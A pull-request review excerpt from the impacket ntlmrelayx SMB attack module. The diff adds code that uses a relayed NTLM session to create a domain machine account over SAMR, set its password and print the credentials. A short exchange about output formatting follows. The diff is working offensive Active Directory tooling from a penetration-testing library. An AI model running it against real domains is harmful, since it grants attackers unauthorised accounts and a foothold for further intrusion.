impacket/examples/ntlmrelayx/attacks/smbattack.py

```diff
@@ -65,55 +68,122 @@ def run(self):
+                    else:
+                        computerName = self.config.addComputerSMB if self.config.addComputerSMB.endswith('$') else self.config.addComputerSMB + '$'
+
+                    # Code from the addComputer.py script
+                    try:
+                        createUser = samr.hSamrCreateUser2InDomain(remoteOps.getSamr(), remoteOps.getDomainHandle(), computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE)
+                    except samr.DCERPCSessionError as e:
+                        if e.error_code == 0xc0000022:
+                            raise Exception("Relayed user doesn't have right to create a machine account!")
+                        elif e.error_code == 0xc00002e7:
+                            raise Exception("Relayed user machine quota exceeded!")
+                        else:
+                            raise e
+
+                    # Account password setup. In the NTLM relay situation it is not possible to use 'hSamrSetPasswordInternal4New()' because an error for "STATUS_WRONG_PASSWORD" is raised
+                    # For the moment, don't know why this error is raised with the "USER_FORCE_PASSWORD_CHANGE" access mask during a relay
+                    # However, with 'hSamrChangePasswordUser()' it seems to work by specifying the "old HashNT" which is the default "blank" password hash
+                    newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
+                    try:
+                        userHandle = createUser['UserHandle']
+                        samr.hSamrChangePasswordUser(remoteOps.getSamr(), userHandle, oldPassword='', newPassword=newPassword, oldPwdHashNT="31d6cfe0d16ae931b73c59d7e0c089c0",
+                                                    newPwdHashLM='', newPwdHashNT='')
+                    except Exception as e:
+                        LOG.error("Error with password setup:\n" + str(e))
+
+                    # Still from addComputer.py
+                    checkForUser = samr.hSamrLookupNamesInDomain(remoteOps.getSamr(), remoteOps.getDomainHandle(), [computerName])
+                    userRID = checkForUser['RelativeIds']['Element'][0]
+                    openUser = samr.hSamrOpenUser(remoteOps.getSamr(), remoteOps.getDomainHandle(), samr.MAXIMUM_ALLOWED, userRID)
+                    userHandle = openUser['UserHandle']
+                    req = samr.SAMPR_USER_INFO_BUFFER()
+                    req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
+                    req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
+                    samr.hSamrSetInformationUser2(remoteOps.getSamr(), userHandle, req)
+                    print("Successfully added machine account %s with password %s." % (computerName, newPassword))
```

Comment:
The "." at the end is very confusing because you can think it's part of the password :)

![image](https://user-images.githubusercontent.com/5891788/160610573-63e6661e-a694-461f-b899-d459b5dc9b67.png)

Reply:
Ow yeah, yesterday I have seen it and I was like "hum, I have to change that it is not very practical"...yep yep...now it's done, I have removed it :)